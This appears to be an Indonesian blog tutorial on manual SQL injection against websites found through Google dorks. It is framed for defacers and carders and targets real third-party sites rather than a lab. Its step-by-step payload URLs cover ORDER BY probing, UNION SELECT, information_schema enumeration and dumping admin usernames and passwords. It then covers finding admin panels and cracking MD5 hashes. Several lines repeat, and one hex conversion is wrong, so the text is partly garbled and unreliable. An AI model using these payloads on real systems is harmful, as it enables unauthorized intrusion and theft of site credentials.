sebelah terima kasih web Gangters untuk tutorial nya
maaf gan kali ini tutorial nya tidak menggunakan gambar
hanya berbentuk text, oke tahap yang pertama :
1. kalian pasti tau dork itu buat apa ? para defacer dan carding
pasti tau, siapkan dulu dork ampuh kalian buat nyari target,
kalau biasa nya dork umum yang sering saya pakai ini :
inurl:index.php?id=inurl:Pageid=
inurl:page.php?file=
dan masih banyak lagi, kembangkan sendiri
2. ketika pas kalian masukan dork ke google dan muncul banyak web disitu
klik salah satu web yang ingin agan di mainkan
2. ketika pas kalian masukan dork ke google dan muncul banyak web disitu
klik salah satu web yang ingin agan di mainkan
3. Tambahkan karakter ' pada akhir url'nya untuk
mengetahui
vlunerability'nya Contoh : www.site.com/news.php?id=31'
contoh simple aje site.com cuma contoh
4. kalau muncul tulisan seperti "syntax error" berarti web
contoh simple aje site.com cuma contoh
4. kalau muncul tulisan seperti "syntax error" berarti web
tersebut
vlun alias bisa kita pentest Contoh errornya :
warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line
ada pada database web
tersebut dengan cara menambahkan
karakter +order+by+1-- di belakang
url
Contoh : www.site.com/news.php?id=31+order+by+1--
kalian coba satu persatu hingga muncul tulisan error.
Contoh : www.site.com/news.php?id=31+order+by+2--
www.site.com/news.php?id=31+order+by+3--
www.site.com/news.php?id=31+order+by+4--
www.site.com/news.php?id=31+order+by+5--
saya memisalkan jumlah table web ada 5 (errornya di 5)
6. Kemudian kita gunakan perintah union untuk mengeluarkan
Contoh : www.site.com/news.php?id=31+order+by+1--
kalian coba satu persatu hingga muncul tulisan error.
Contoh : www.site.com/news.php?id=31+order+by+2--
www.site.com/news.php?id=31+order+by+3--
www.site.com/news.php?id=31+order+by+4--
www.site.com/news.php?id=31+order+by+5--
saya memisalkan jumlah table web ada 5 (errornya di 5)
6. Kemudian kita gunakan perintah union untuk mengeluarkan
nomor yang nantinya
kita gunakan. Tambahkan +union+select+1,2,3,4,5--
Contoh : www.site.com/news.php?id=31+union+select+1,2,3,4,5--
Saya memisalkan angka 4 yang keluar
7. Sekarang masukkan version() pada angka 4 untuk memaparkan version
Contoh : www.site.com/news.php?id=31+union+select+1,2,3,version(),5--
Contoh : www.site.com/news.php?id=31+union+select+1,2,3,4,5--
Saya memisalkan angka 4 yang keluar
7. Sekarang masukkan version() pada angka 4 untuk memaparkan version
Contoh : www.site.com/news.php?id=31+union+select+1,2,3,version(),5--
8. Kita munculkan nama-nama table yang ada pada web tersebut
dengan
memasukkan perintah table_name pada angka 3 dan
perintah +from+information_schema.tables-- dibelakang url
Contoh :
Contoh :
www.site.com/news.php?id=31+union+select+1,2,3,table_name,5+from+information_schema.tables--
Nantinya kita akan melihat nama nama table yang ada pada web
9. Kita lihat isi yang ada di dalam table tersebut dengan memasukkan perintah group_concat(table_name) pada angka 4
dan
perintah +where+table_schema=database()-- di akhir url
Contoh :
Contoh :
www.site.com/news.php?id=31+union+select+1,2,3,group_concat(table_name),5+from+information_schema.tables+where+table_schema=database()--
10. Selanjutnya kita keluarkan isi yang ada di table
tersebut (column) dengan
memasukkan perintah
group_concat(column_name) pada angka 4 dan
+from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin--
di
akhir url.
Untuk langkah ke 10 ini silahkan anda convert terlebih dahulu
text nama
table'nya ke hexadecimal [disini] Jadi misalkan
nama table'nya tadi admin maka jika di convert
akan
menjadi 71846D796E, Contoh
:
www.site.com/news.php?id=31+union+select+1,2,3,group_concat(column_name),5+from+information_schema.columns+where+table_name=0x71846D796E--
Nanti akan muncul column yang berisikan username dan password
11. Lalu kita lihat isi dari column yang kita temukan.
11. Lalu kita lihat isi dari column yang kita temukan.
saya misalkan nama
tablenya adalah admin, dan isi dari table admin
adalah column username &
password. Maka masukkan
perintah concat_ws(0x3a,"nama column yang ada
di dalam
table admin") pada angka 4 dan
perintah +from+Admin-- di akhir url
Contoh :
Contoh :
www.site.com/news.php?id=31+union+select+1,2,3,concat_ws(0x3a,"username,password"),5+from+Admin--
12. Maka kita akan melihat username dan password admin
dari web tersebut.
Saatnya kita eksekusi.
13. Cari admin pagenya, biasanya dengan menambahkan
13. Cari admin pagenya, biasanya dengan menambahkan
tulisan berikut di akhir
url web target.
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/
Contoh : www.site.com/admin/
Nah isikan username dan password yang tadi di dapat.
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/
Contoh : www.site.com/admin/
Nah isikan username dan password yang tadi di dapat.
Jika password berbentuk
MD5
seperti b10adc3949ba59abbe56c057f20f883e, kalian crack dulu [disini]
sekian tutorial nya semoga bermanfaat bagi kalian semua
sekian tutorial nya semoga bermanfaat bagi kalian semua
yang baru mempelajari perintah SQLi manual.
0 Comments